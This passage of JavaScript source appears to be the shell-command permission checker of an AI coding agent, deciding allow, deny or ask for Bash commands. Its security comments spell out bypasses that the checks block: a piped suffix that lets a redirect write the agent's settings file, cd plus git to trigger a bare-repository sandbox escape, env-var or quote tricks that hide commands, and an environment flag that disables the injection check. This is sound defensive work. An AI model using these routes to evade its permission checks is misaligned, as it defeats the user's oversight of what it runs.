- tooComplex = astResult.kind === 'too-complex';
1353
- semanticFail =
1354
- astResult.kind === 'simple' && !checkSemantics(astResult.commands).ok;
1355
- const tsSubs = astResult.kind === 'simple'
1356
- ? astResult.commands.map(c => c.text)
1357
- : undefined;
1358
- const legacySubs = splitCommand(input.command);
1359
- shadowLegacySubs = legacySubs;
1360
- subsDiffer =
1361
- tsSubs !== undefined &&
1362
- (tsSubs.length !== legacySubs.length ||
1363
- tsSubs.some((s, i) => s !== legacySubs[i]));
1364
- }
1365
- logEvent('tengu_tree_sitter_shadow', {
1366
- available,
1367
- astTooComplex: tooComplex,
1368
- astSemanticFail: semanticFail,
1369
- subsDiffer,
1370
- injectionCheckDisabled,
1371
- killswitchOff: !shadowEnabled,
1372
- cmdOverLength: input.command.length > 10000,
1373
- });
1374
- // Always force legacy — shadow mode is observational only.
1375
- astResult = { kind: 'parse-unavailable' };
1376
- astRoot = null;
1377
- }
1378
- if (astResult.kind === 'too-complex') {
1379
- // Parse succeeded but found structure we can't statically analyze
1380
- // (command substitution, expansion, control flow, parser differential).
1381
- // Respect exact-match deny/ask/allow, then prefix/wildcard deny. Only
1382
- // fall through to ask if no deny matched — don't downgrade deny to ask.
1383
- const earlyExit = checkEarlyExitDeny(input, appState.toolPermissionContext);
1384
- if (earlyExit !== null)
1385
- return earlyExit;
1386
- const decisionReason = {
1387
- type: 'other',
1388
- reason: astResult.reason,
1389
- };
1390
- logEvent('tengu_bash_ast_too_complex', {
1391
- nodeTypeId: nodeTypeId(astResult.nodeType),
1392
- });
1393
- return {
1394
- behavior: 'ask',
1395
- decisionReason,
1396
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
1397
- suggestions: [],
1398
- ...(feature('BASH_CLASSIFIER')
1399
- ? {
1400
- pendingClassifierCheck: buildPendingClassifierCheck(input.command, appState.toolPermissionContext),
1401
- }
1402
- : {}),
1403
- };
1404
- }
1405
- if (astResult.kind === 'simple') {
1406
- // Clean parse: check semantic-level concerns (zsh builtins, eval, etc.)
1407
- // that tokenize fine but are dangerous by name.
1408
- const sem = checkSemantics(astResult.commands);
1409
- if (!sem.ok) {
1410
- // Same deny-rule enforcement as the too-complex path: a user with
1411
- // `Bash(eval:*)` deny expects `eval "rm"` blocked, not downgraded.
1412
- const earlyExit = checkSemanticsDeny(input, appState.toolPermissionContext, astResult.commands);
1413
- if (earlyExit !== null)
1414
- return earlyExit;
1415
- const decisionReason = {
1416
- type: 'other',
1417
- reason: sem.reason,
1418
- };
1419
- return {
1420
- behavior: 'ask',
1421
- decisionReason,
1422
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
1423
- suggestions: [],
1424
- };
1425
- }
1426
- // Stash the tokenized subcommands for use below. Downstream code (rule
1427
- // matching, path extraction, cd detection) still operates on strings, so
1428
- // we pass the original source span for each SimpleCommand. Downstream
1429
- // processing (stripSafeWrappers, parseCommandArguments) re-tokenizes
1430
- // these spans — that re-tokenization has known bugs (stripCommentLines
1431
- // mishandles newlines inside quotes), but checkSemantics already caught
1432
- // any argv element containing a newline, so those bugs can't bite here.
1433
- // Migrating downstream to operate on argv directly is a later commit.
1434
- astSubcommands = astResult.commands.map(c => c.text);
1435
- astRedirects = astResult.commands.flatMap(c => c.redirects);
1436
- astCommands = astResult.commands;
1437
- }
1438
- // Legacy shell-quote pre-check. Only reached on 'parse-unavailable'
1439
- // (tree-sitter not loaded OR TREE_SITTER_BASH feature gated off). Falls
1440
- // through to the full legacy path below.
1441
- if (astResult.kind === 'parse-unavailable') {
1442
- logForDebugging('bashToolHasPermission: tree-sitter unavailable, using legacy shell-quote path');
1443
- const parseResult = tryParseShellCommand(input.command);
1444
- if (!parseResult.success) {
1445
- const decisionReason = {
1446
- type: 'other',
1447
- reason: `Command contains malformed syntax that cannot be parsed: ${parseResult.error}`,
1448
- };
1449
- return {
1450
- behavior: 'ask',
1451
- decisionReason,
1452
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
1453
- };
1454
- }
1455
- }
1456
- // Check sandbox auto-allow (which respects explicit deny/ask rules)
1457
- // Only call this if sandboxing and auto-allow are both enabled
1458
- if (SandboxManager.isSandboxingEnabled() &&
1459
- SandboxManager.isAutoAllowBashIfSandboxedEnabled() &&
1460
- shouldUseSandbox(input)) {
1461
- const sandboxAutoAllowResult = checkSandboxAutoAllow(input, appState.toolPermissionContext);
1462
- if (sandboxAutoAllowResult.behavior !== 'passthrough') {
1463
- return sandboxAutoAllowResult;
1464
- }
1465
- }
1466
- // Check exact match first
1467
- const exactMatchResult = bashToolCheckExactMatchPermission(input, appState.toolPermissionContext);
1468
- // Exact command was denied
1469
- if (exactMatchResult.behavior === 'deny') {
1470
- return exactMatchResult;
1471
- }
1472
- // Check Bash prompt deny and ask rules in parallel (both use Haiku).
1473
- // Deny takes precedence over ask, and both take precedence over allow rules.
1474
- // Skip when in auto mode - auto mode classifier handles all permission decisions
1475
- if (isClassifierPermissionsEnabled() &&
1476
- !(feature('TRANSCRIPT_CLASSIFIER') &&
1477
- appState.toolPermissionContext.mode === 'auto')) {
1478
- const denyDescriptions = getBashPromptDenyDescriptions(appState.toolPermissionContext);
1479
- const askDescriptions = getBashPromptAskDescriptions(appState.toolPermissionContext);
1480
- const hasDeny = denyDescriptions.length > 0;
1481
- const hasAsk = askDescriptions.length > 0;
1482
- if (hasDeny || hasAsk) {
1483
- const [denyResult, askResult] = await Promise.all([
1484
- hasDeny
1485
- ? classifyBashCommand(input.command, getCwd(), denyDescriptions, 'deny', context.abortController.signal, context.options.isNonInteractiveSession)
1486
- : null,
1487
- hasAsk
1488
- ? classifyBashCommand(input.command, getCwd(), askDescriptions, 'ask', context.abortController.signal, context.options.isNonInteractiveSession)
1489
- : null,
1490
- ]);
1491
- if (context.abortController.signal.aborted) {
1492
- throw new AbortError();
1493
- }
1494
- if (denyResult) {
1495
- logClassifierResultForAnts(input.command, 'deny', denyDescriptions, denyResult);
1496
- }
1497
- if (askResult) {
1498
- logClassifierResultForAnts(input.command, 'ask', askDescriptions, askResult);
1499
- }
1500
- // Deny takes precedence
1501
- if (denyResult?.matches && denyResult.confidence === 'high') {
1502
- return {
1503
- behavior: 'deny',
1504
- message: `Denied by Bash prompt rule: "${denyResult.matchedDescription}"`,
1505
- decisionReason: {
1506
- type: 'other',
1507
- reason: `Denied by Bash prompt rule: "${denyResult.matchedDescription}"`,
1508
- },
1509
- };
1510
- }
1511
- if (askResult?.matches && askResult.confidence === 'high') {
1512
- // Skip the Haiku call — the UI computes the prefix locally
1513
- // and lets the user edit it. Still call the injected function
1514
- // when tests override it.
1515
- let suggestions;
1516
- if (getCommandSubcommandPrefixFn === getCommandSubcommandPrefix) {
1517
- suggestions = suggestionForExactCommand(input.command);
1518
- }
1519
- else {
1520
- const commandPrefixResult = await getCommandSubcommandPrefixFn(input.command, context.abortController.signal, context.options.isNonInteractiveSession);
1521
- if (context.abortController.signal.aborted) {
1522
- throw new AbortError();
1523
- }
1524
- suggestions = commandPrefixResult?.commandPrefix
1525
- ? suggestionForPrefix(commandPrefixResult.commandPrefix)
1526
- : suggestionForExactCommand(input.command);
1527
- }
1528
- return {
1529
- behavior: 'ask',
1530
- message: createPermissionRequestMessage(BashTool.name),
1531
- decisionReason: {
1532
- type: 'other',
1533
- reason: `Required by Bash prompt rule: "${askResult.matchedDescription}"`,
1534
- },
1535
- suggestions,
1536
- ...(feature('BASH_CLASSIFIER')
1537
- ? {
1538
- pendingClassifierCheck: buildPendingClassifierCheck(input.command, appState.toolPermissionContext),
1539
- }
1540
- : {}),
1541
- };
1542
- }
1543
- }
1544
- }
1545
- // Check for non-subcommand Bash operators like `>`, `|`, etc.
1546
- // This must happen before dangerous path checks so that piped commands
1547
- // are handled by the operator logic (which generates "multiple operations" messages)
1548
- const commandOperatorResult = await checkCommandOperatorPermissions(input, (i) => bashToolHasPermission(i, context, getCommandSubcommandPrefixFn), { isNormalizedCdCommand, isNormalizedGitCommand }, astRoot);
1549
- if (commandOperatorResult.behavior !== 'passthrough') {
1550
- // SECURITY FIX: When pipe segment processing returns 'allow', we must still validate
1551
- // the ORIGINAL command. The pipe segment processing strips redirections before
1552
- // checking each segment, so commands like:
1553
- // echo 'x' | xargs printf '%s' >> /tmp/file
1554
- // would have both segments allowed (echo and xargs printf) but the >> redirection
1555
- // would bypass validation. We must check:
1556
- // 1. Path constraints for output redirections
1557
- // 2. Command safety for dangerous patterns (backticks, etc.) in redirect targets
1558
- if (commandOperatorResult.behavior === 'allow') {
1559
- // Check for dangerous patterns (backticks, $(), etc.) in the original command
1560
- // This catches cases like: echo x | xargs echo > `pwd`/evil.txt
1561
- // where the backtick is in the redirect target (stripped from segments)
1562
- // Gate on AST: when astSubcommands is non-null, tree-sitter already
1563
- // validated structure (backticks/$() in redirect targets would have
1564
- // returned too-complex). Matches gating at ~1481, ~1706, ~1755.
1565
- // Avoids FP: `find -exec {} \; | grep x` tripping on backslash-;.
1566
- // bashCommandIsSafe runs the full legacy regex battery (~20 patterns) —
1567
- // only call it when we'll actually use the result.
1568
- const safetyResult = astSubcommands === null
1569
- ? await bashCommandIsSafeAsync(input.command)
1570
- : null;
1571
- if (safetyResult !== null &&
1572
- safetyResult.behavior !== 'passthrough' &&
1573
- safetyResult.behavior !== 'allow') {
1574
- // Attach pending classifier check - may auto-approve before user responds
1575
- appState = context.getAppState();
1576
- return {
1577
- behavior: 'ask',
1578
- message: createPermissionRequestMessage(BashTool.name, {
1579
- type: 'other',
1580
- reason: safetyResult.message ??
1581
- 'Command contains patterns that require approval',
1582
- }),
1583
- decisionReason: {
1584
- type: 'other',
1585
- reason: safetyResult.message ??
1586
- 'Command contains patterns that require approval',
1587
- },
1588
- ...(feature('BASH_CLASSIFIER')
1589
- ? {
1590
- pendingClassifierCheck: buildPendingClassifierCheck(input.command, appState.toolPermissionContext),
1591
- }
1592
- : {}),
1593
- };
1594
- }
1595
- appState = context.getAppState();
1596
- // SECURITY: Compute compoundCommandHasCd from the full command, NOT
1597
- // hardcode false. The pipe-handling path previously passed `false` here,
1598
- // disabling the cd+redirect check at pathValidation.ts:821. Appending
1599
- // `| echo done` to `cd .claude && echo x > settings.json` routed through
1600
- // this path with compoundCommandHasCd=false, letting the redirect write
1601
- // to .claude/settings.json without the cd+redirect block firing.
1602
- const pathResult = checkPathConstraints(input, getCwd(), appState.toolPermissionContext, commandHasAnyCd(input.command), astRedirects, astCommands);
1603
- if (pathResult.behavior !== 'passthrough') {
1604
- return pathResult;
1605
- }
1606
- }
1607
- // When pipe segments return 'ask' (individual segments not allowed by rules),
1608
- // attach pending classifier check - may auto-approve before user responds.
1609
- if (commandOperatorResult.behavior === 'ask') {
1610
- appState = context.getAppState();
1611
- return {
1612
- ...commandOperatorResult,
1613
- ...(feature('BASH_CLASSIFIER')
1614
- ? {
1615
- pendingClassifierCheck: buildPendingClassifierCheck(input.command, appState.toolPermissionContext),
1616
- }
1617
- : {}),
1618
- };
1619
- }
1620
- return commandOperatorResult;
1621
- }
1622
- // SECURITY: Legacy misparsing gate. Only runs when the tree-sitter module
1623
- // is not loaded. Timeout/abort is fail-closed via too-complex (returned
1624
- // early above), not routed here. When the AST parse succeeded,
1625
- // astSubcommands is non-null and we've already validated structure; this
1626
- // block is skipped entirely. The AST's 'too-complex' result subsumes
1627
- // everything isBashSecurityCheckForMisparsing covered — both answer the
1628
- // same question: "can splitCommand be trusted on this input?"
1629
- if (astSubcommands === null &&
1630
- !isEnvTruthy(process.env.CLAUDE_CODE_DISABLE_COMMAND_INJECTION_CHECK)) {
1631
- const originalCommandSafetyResult = await bashCommandIsSafeAsync(input.command);
1632
- if (originalCommandSafetyResult.behavior === 'ask' &&
1633
- originalCommandSafetyResult.isBashSecurityCheckForMisparsing) {
1634
- // Compound commands with safe heredoc patterns ($(cat <<'EOF'...EOF))
1635
- // trigger the $() check on the unsplit command. Strip the safe heredocs
1636
- // and re-check the remainder — if other misparsing patterns exist
1637
- // (e.g. backslash-escaped operators), they must still block.
1638
- const remainder = stripSafeHeredocSubstitutions(input.command);
1639
- const remainderResult = remainder !== null ? await bashCommandIsSafeAsync(remainder) : null;
1640
- if (remainder === null ||
1641
- (remainderResult?.behavior === 'ask' &&
1642
- remainderResult.isBashSecurityCheckForMisparsing)) {
1643
- // Allow if the exact command has an explicit allow permission — the user
1644
- // made a conscious choice to permit this specific command.
1645
- appState = context.getAppState();
1646
- const exactMatchResult = bashToolCheckExactMatchPermission(input, appState.toolPermissionContext);
1647
- if (exactMatchResult.behavior === 'allow') {
1648
- return exactMatchResult;
1649
- }
1650
- // Attach pending classifier check - may auto-approve before user responds
1651
- const decisionReason = {
1652
- type: 'other',
1653
- reason: originalCommandSafetyResult.message,
1654
- };
1655
- return {
1656
- behavior: 'ask',
1657
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
1658
- decisionReason,
1659
- suggestions: [], // Don't suggest saving a potentially dangerous command
1660
- ...(feature('BASH_CLASSIFIER')
1661
- ? {
1662
- pendingClassifierCheck: buildPendingClassifierCheck(input.command, appState.toolPermissionContext),
1663
- }
1664
- : {}),
1665
- };
1666
- }
1667
- }
1668
- }
1669
- // Split into subcommands. Prefer the AST-extracted spans; fall back to
1670
- // splitCommand only when tree-sitter was unavailable. The cd-cwd filter
1671
- // strips the `cd ${cwd}` prefix that models like to prepend.
1672
- const cwd = getCwd();
1673
- const cwdMingw = getPlatform() === 'windows' ? windowsPathToPosixPath(cwd) : cwd;
1674
- const rawSubcommands = astSubcommands ?? shadowLegacySubs ?? splitCommand(input.command);
1675
- const { subcommands, astCommandsByIdx } = filterCdCwdSubcommands(rawSubcommands, astCommands, cwd, cwdMingw);
1676
- // CC-643: Cap subcommand fanout. Only the legacy splitCommand path can
1677
- // explode — the AST path returns a bounded list (astSubcommands !== null)
1678
- // or short-circuits to 'too-complex' for structures it can't represent.
1679
- if (astSubcommands === null &&
1680
- subcommands.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
1681
- logForDebugging(`bashPermissions: ${subcommands.length} subcommands exceeds cap (${MAX_SUBCOMMANDS_FOR_SECURITY_CHECK}) — returning ask`, { level: 'debug' });
1682
- const decisionReason = {
1683
- type: 'other',
1684
- reason: `Command splits into ${subcommands.length} subcommands, too many to safety-check individually`,
1685
- };
1686
- return {
1687
- behavior: 'ask',
1688
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
1689
- decisionReason,
1690
- };
1691
- }
1692
- // Ask if there are multiple `cd` commands
1693
- const cdCommands = subcommands.filter(subCommand => isNormalizedCdCommand(subCommand));
1694
- if (cdCommands.length > 1) {
1695
- const decisionReason = {
1696
- type: 'other',
1697
- reason: 'Multiple directory changes in one command require approval for clarity',
1698
- };
1699
- return {
1700
- behavior: 'ask',
1701
- decisionReason,
1702
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
1703
- };
1704
- }
1705
- // Track if compound command contains cd for security validation
1706
- // This prevents bypassing path checks via: cd .claude/ && mv test.txt settings.json
1707
- const compoundCommandHasCd = cdCommands.length > 0;
1708
- // SECURITY: Block compound commands that have both cd AND git
1709
- // This prevents sandbox escape via: cd /malicious/dir && git status
1710
- // where the malicious directory contains a bare git repo with core.fsmonitor.
1711
- // This check must happen HERE (before subcommand-level permission checks)
1712
- // because bashToolCheckPermission checks each subcommand independently via
1713
- // BashTool.isReadOnly(), which would re-derive compoundCommandHasCd=false
1714
- // from just "git status" alone, bypassing the readOnlyValidation.ts check.
1715
- if (compoundCommandHasCd) {
1716
- const hasGitCommand = subcommands.some(cmd => isNormalizedGitCommand(cmd.trim()));
1717
- if (hasGitCommand) {
1718
- const decisionReason = {
1719
- type: 'other',
1720
- reason: 'Compound commands with cd and git require approval to prevent bare repository attacks',
1721
- };
1722
- return {
1723
- behavior: 'ask',
1724
- decisionReason,
1725
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
1726
- };
1727
- }
1728
- }
1729
- appState = context.getAppState(); // re-compute the latest in case the user hit shift+tab
1730
- // SECURITY FIX: Check Bash deny/ask rules BEFORE path constraints
1731
- // This ensures that explicit deny rules like Bash(ls:*) take precedence over
1732
- // path constraint checks that return 'ask' for paths outside the project.
1733
- // Without this ordering, absolute paths outside the project (e.g., ls /home)
1734
- // would bypass deny rules because checkPathConstraints would return 'ask' first.
1735
- //
1736
- // Note: bashToolCheckPermission calls checkPathConstraints internally, which handles
1737
- // output redirection validation on each subcommand. However, since splitCommand strips
1738
- // redirections before we get here, we MUST validate output redirections on the ORIGINAL
1739
- // command AFTER checking deny rules but BEFORE returning results.
1740
- const subcommandPermissionDecisions = subcommands.map((command, i) => bashToolCheckPermission({ command }, appState.toolPermissionContext, compoundCommandHasCd, astCommandsByIdx[i]));
1741
- // Deny if any subcommands are denied
1742
- const deniedSubresult = subcommandPermissionDecisions.find(_ => _.behavior === 'deny');
1743
- if (deniedSubresult !== undefined) {
1744
- return {
1745
- behavior: 'deny',
1746
- message: `Permission to use ${BashTool.name} with command ${input.command} has been denied.`,
1747
- decisionReason: {
1748
- type: 'subcommandResults',
1749
- reasons: new Map(subcommandPermissionDecisions.map((result, i) => [
1750
- subcommands[i],
1751
- result,
1752
- ])),
1753
- },
1754
- };
1755
- }
1756
- // Validate output redirections on the ORIGINAL command (before splitCommand stripped them)
1757
- // This must happen AFTER checking deny rules but BEFORE returning results.
1758
- // Output redirections like "> /etc/passwd" are stripped by splitCommand, so the per-subcommand
1759
- // checkPathConstraints calls won't see them. We validate them here on the original input.
1760
- // SECURITY: When AST data is available, pass AST-derived redirects so
1761
- // checkPathConstraints uses them directly instead of re-parsing with
1762
- // shell-quote (which has a known single-quote backslash misparsing bug
1763
- // that can silently hide redirect operators).
1764
- const pathResult = checkPathConstraints(input, getCwd(), appState.toolPermissionContext, compoundCommandHasCd, astRedirects, astCommands);
1765
- if (pathResult.behavior === 'deny') {
1766
- return pathResult;
1767
- }
1768
- const askSubresult = subcommandPermissionDecisions.find(_ => _.behavior === 'ask');
1769
- const nonAllowCount = count(subcommandPermissionDecisions, _ => _.behavior !== 'allow');
1770
- // SECURITY (GH#28784): Only short-circuit on a path-constraint 'ask' when no
1771
- // subcommand independently produced an 'ask'. checkPathConstraints re-runs the
1772
- // path-command loop on the full input, so `cd <outside-project> && python3 foo.py`
1773
- // produces an ask with ONLY a Read(<dir>/**) suggestion — the UI renders it as
1774
- // "Yes, allow reading from <dir>/" and picking that option silently approves
1775
- // python3. When a subcommand has its own ask (e.g. the cd subcommand's own
1776
- // path-constraint ask), fall through: either the askSubresult short-circuit
1777
- // below fires (single non-allow subcommand) or the merge flow collects Bash
1778
- // rule suggestions for every non-allow subcommand. The per-subcommand
1779
- // checkPathConstraints call inside bashToolCheckPermission already captures
1780
- // the Read rule for the cd target in that path.
1781
- //
1782
- // When no subcommand asked (all allow, or all passthrough like `printf > file`),
1783
- // pathResult IS the only ask — return it so redirection checks surface.
1784
- if (pathResult.behavior === 'ask' && askSubresult === undefined) {
1785
- return pathResult;
1786
- }
1787
- // Ask if any subcommands require approval (e.g., ls/cd outside boundaries).
1788
- // Only short-circuit when exactly ONE subcommand needs approval — if multiple
1789
- // do (e.g. cd-outside-project ask + python3 passthrough), fall through to the
1790
- // merge flow so the prompt surfaces Bash rule suggestions for all of them
1791
- // instead of only the first ask's Read rule (GH#28784).
1792
- if (askSubresult !== undefined && nonAllowCount === 1) {
1793
- return {
1794
- ...askSubresult,
1795
- ...(feature('BASH_CLASSIFIER')
1796
- ? {
1797
- pendingClassifierCheck: buildPendingClassifierCheck(input.command, appState.toolPermissionContext),
1798
- }
1799
- : {}),
1800
- };
1801
- }
1802
- // Allow if exact command was allowed
1803
- if (exactMatchResult.behavior === 'allow') {
1804
- return exactMatchResult;
1805
- }
1806
- // If all subcommands are allowed via exact or prefix match, allow the
1807
- // command — but only if no command injection is possible. When the AST
1808
- // parse succeeded, each subcommand is already known-safe (no hidden
1809
- // substitutions, no structural tricks); the per-subcommand re-check is
1810
- // redundant. When on the legacy path, re-run bashCommandIsSafeAsync per sub.
1811
- let hasPossibleCommandInjection = false;
1812
- if (astSubcommands === null &&
1813
- !isEnvTruthy(process.env.CLAUDE_CODE_DISABLE_COMMAND_INJECTION_CHECK)) {
1814
- // CC-643: Batch divergence telemetry into a single logEvent. The per-sub
1815
- // logEvent was the hot-path syscall driver (each call → /proc/self/stat
1816
- // via process.memoryUsage()). Aggregate count preserves the signal.
1817
- let divergenceCount = 0;
1818
- const onDivergence = () => {
1819
- divergenceCount++;
1820
- };
1821
- const results = await Promise.all(subcommands.map(c => bashCommandIsSafeAsync(c, onDivergence)));
1822
- hasPossibleCommandInjection = results.some(r => r.behavior !== 'passthrough');
1823
- if (divergenceCount > 0) {
1824
- logEvent('tengu_tree_sitter_security_divergence', {
1825
- quoteContextDivergence: true,
1826
- count: divergenceCount,
1827
- });
1828
- }
1829
- }
1830
- if (subcommandPermissionDecisions.every(_ => _.behavior === 'allow') &&
1831
- !hasPossibleCommandInjection) {
1832
- return {
1833
- behavior: 'allow',
1834
- updatedInput: input,
1835
- decisionReason: {
1836
- type: 'subcommandResults',
1837
- reasons: new Map(subcommandPermissionDecisions.map((result, i) => [
1838
- subcommands[i],
1839
- result,
1840
- ])),
1841
- },
1842
- };
1843
- }
1844
- // Query Haiku for command prefixes
1845
- // Skip the Haiku call — the UI computes the prefix locally and
1846
- // lets the user edit it. Still call when a custom fn is injected (tests).
1847
- let commandSubcommandPrefix = null;
1848
- if (getCommandSubcommandPrefixFn !== getCommandSubcommandPrefix) {
1849
- commandSubcommandPrefix = await getCommandSubcommandPrefixFn(input.command, context.abortController.signal, context.options.isNonInteractiveSession);
1850
- if (context.abortController.signal.aborted) {
1851
- throw new AbortError();
1852
- }
1853
- }
1854
- // If there is only one command, no need to process subcommands
1855
- appState = context.getAppState(); // re-compute the latest in case the user hit shift+tab
1856
- if (subcommands.length === 1) {
1857
- const result = await checkCommandAndSuggestRules({ command: subcommands[0] }, appState.toolPermissionContext, commandSubcommandPrefix, compoundCommandHasCd, astSubcommands !== null);
1858
- // If command wasn't allowed, attach pending classifier check.
1859
- // At this point, 'ask' can only come from bashCommandIsSafe (security check inside
1860
- // checkCommandAndSuggestRules), NOT from explicit ask rules - those were already
1861
- // filtered out at step 13 (askSubresult check). The classifier can bypass security.
1862
- if (result.behavior === 'ask' || result.behavior === 'passthrough') {
1863
- return {
1864
- ...result,
1865
- ...(feature('BASH_CLASSIFIER')
1866
- ? {
1867
- pendingClassifierCheck: buildPendingClassifierCheck(input.command, appState.toolPermissionContext),
1868
- }
1869
- : {}),
1870
- };
1871
- }
1872
- return result;
1873
- }
1874
- // Check subcommand permission results
1875
- const subcommandResults = new Map();
1876
- for (const subcommand of subcommands) {
1877
- subcommandResults.set(subcommand, await checkCommandAndSuggestRules({
1878
- // Pass through input params like `sandbox`
1879
- ...input,
1880
- command: subcommand,
1881
- }, appState.toolPermissionContext, commandSubcommandPrefix?.subcommandPrefixes.get(subcommand), compoundCommandHasCd, astSubcommands !== null));
1882
- }
1883
- // Allow if all subcommands are allowed
1884
- // Note that this is different than 6b because we are checking the command injection results.
1885
- if (subcommands.every(subcommand => {
1886
- const permissionResult = subcommandResults.get(subcommand);
1887
- return permissionResult?.behavior === 'allow';
1888
- })) {
1889
- // Keep subcommandResults as PermissionResult for decisionReason
1890
- return {
1891
- behavior: 'allow',
1892
- updatedInput: input,
1893
- decisionReason: {
1894
- type: 'subcommandResults',
1895
- reasons: subcommandResults,
1896
- },
1897
- };
1898
- }
1899
- // Otherwise, ask for permission
1900
- const collectedRules = new Map();
1901
- for (const [subcommand, permissionResult] of subcommandResults) {
1902
- if (permissionResult.behavior === 'ask' ||
1903
- permissionResult.behavior === 'passthrough') {
1904
- const updates = 'suggestions' in permissionResult
1905
- ? permissionResult.suggestions
1906
- : undefined;
1907
- const rules = extractRules(updates);
1908
- for (const rule of rules) {
1909
- // Use string representation as key for deduplication
1910
- const ruleKey = permissionRuleValueToString(rule);
1911
- collectedRules.set(ruleKey, rule);
1912
- }
1913
- // GH#28784 follow-up: security-check asks (compound-cd+write, process
1914
- // substitution, etc.) carry no suggestions. In a compound command like
1915
- // `cd ~/out && rm -rf x`, that means only cd's Read rule gets collected
1916
- // and the UI labels the prompt "Yes, allow reading from <dir>/" — never
1917
- // mentioning rm. Synthesize a Bash(exact) rule so the UI shows the
1918
- // chained command. Skip explicit ask rules (decisionReason.type 'rule')
1919
- // where the user deliberately wants to review each time.
1920
- if (permissionResult.behavior === 'ask' &&
1921
- rules.length === 0 &&
1922
- permissionResult.decisionReason?.type !== 'rule') {
1923
- for (const rule of extractRules(suggestionForExactCommand(subcommand))) {
1924
- const ruleKey = permissionRuleValueToString(rule);
1925
- collectedRules.set(ruleKey, rule);
1926
- }
1927
- }
1928
- // Note: We only collect rules, not other update types like mode changes
1929
- // This is appropriate for bash subcommands which primarily need rule suggestions
1930
- }
1931
- }
1932
- const decisionReason = {
1933
- type: 'subcommandResults',
1934
- reasons: subcommandResults,
1935
- };
1936
- // GH#11380: Cap at MAX_SUGGESTED_RULES_FOR_COMPOUND. Map preserves insertion
1937
- // order (subcommand order), so slicing keeps the leftmost N.
1938
- const cappedRules = Array.from(collectedRules.values()).slice(0, MAX_SUGGESTED_RULES_FOR_COMPOUND);
1939
- const suggestedUpdates = cappedRules.length > 0
1940
- ? [
1941
- {
1942
- type: 'addRules',
1943
- rules: cappedRules,
1944
- behavior: 'allow',
1945
- destination: 'localSettings',
1946
- },
1947
- ]
1948
- : undefined;
1949
- // Attach pending classifier check - may auto-approve before user responds.
1950
- // Behavior is 'ask' if any subcommand was 'ask' (e.g., path constraint or ask
1951
- // rule) — before the GH#28784 fix, ask subresults always short-circuited above
1952
- // so this path only saw 'passthrough' subcommands and hardcoded that.
1953
- return {
1954
- behavior: askSubresult !== undefined ? 'ask' : 'passthrough',
1955
- message: createPermissionRequestMessage(BashTool.name, decisionReason),
1956
- decisionReason,
1957
- suggestions: suggestedUpdates,
1958
- ...(feature('BASH_CLASSIFIER')
1959
- ? {
1960
- pendingClassifierCheck: buildPendingClassifierCheck(input.command, appState.toolPermissionContext),
1961
- }
1962
- : {}),
1963
- };
1964
- }
1965
- /**
1966
- * Checks if a subcommand is a git command after normalizing away safe wrappers
1967
- * (env vars, timeout, etc.) and shell quotes.
1968
- *
1969
- * SECURITY: Must normalize before matching to prevent bypasses like:
1970
- * 'git' status — shell quotes hide the command from a naive regex
1971
- * NO_COLOR=1 git status — env var prefix hides the command
1972
- */
1973
- export function isNormalizedGitCommand(command) {
1974
- // Fast path: catch the most common case before any parsing
1975
- if (command.startsWith('git ') || command === 'git') {
1976
- return true;
1977
- }
1978
- const stripped = stripSafeWrappers(command);
1979
- const parsed = tryParseShellCommand(stripped);
1980
- if (parsed.success && parsed.tokens.length > 0) {
1981
- // Direct git command
1982
- if (parsed.tokens[0] === 'git') {
1983
- return true;
1984
- }
1985
- // "xargs git ..." — xargs runs git in the current directory,
1986
- // so it must be treated as a git command for cd+git security checks.
1987
- // This matches the xargs prefix handling in filterRulesByContentsMatchingInput.
1988
- if (parsed.tokens[0] === 'xargs' && parsed.tokens.includes('git')) {
1989
- return true;
1990
- }
1991
- return false;
1992
- }
1993
- return /^git(?:\s|$)/.test(stripped);
1994
- }
1995
- /**
1996
- * Checks if a subcommand is a cd command after normalizing away safe wrappers
1997
- * (env vars, timeout, etc.) and shell quotes.
1998
- *
1999
- * SECURITY: Must normalize before matching to prevent bypasses like:
2000
- * FORCE_COLOR=1 cd sub — env var prefix hides the cd from a naive /^cd / regex
2001
- * This mirrors isNormalizedGitCommand to ensure symmetric normalization.
2002
- *
2003
- * Also matches pushd/popd — they change cwd just like cd, so
2004
- * pushd /tmp/bare-repo && git status
2005
- * must trigger the same cd+git guard. Mirrors PowerShell's
2006
- * DIRECTORY_CHANGE_ALIASES (src/utils/powershell/parser.ts).
2007
- */
2008
- export function isNormalizedCdCommand(command) {
2009
- const stripped = stripSafeWrappers(command);
2010
- const parsed = tryParseShellCommand(stripped);
2011
- if (parsed.success && parsed.tokens.length > 0) {
2012
- const cmd = parsed.tokens[0];
2013
- return cmd === 'cd' || cmd === 'pushd' || cmd === 'popd';
2014
- }
2015
- return /^(?:cd|pushd|popd)(?:\s|$)/.test(stripped);
2016
- }
2017
- /**
2018
- * Checks if a compound command contains any cd command,
2019
- * using normalized detection that handles env var prefixes and shell quotes.
2020
- */
2021
- export function commandHasAnyCd(command) {
2022
- return splitCommand(command).some(subcmd => isNormalizedCdCommand(subcmd.trim()));
2023
- }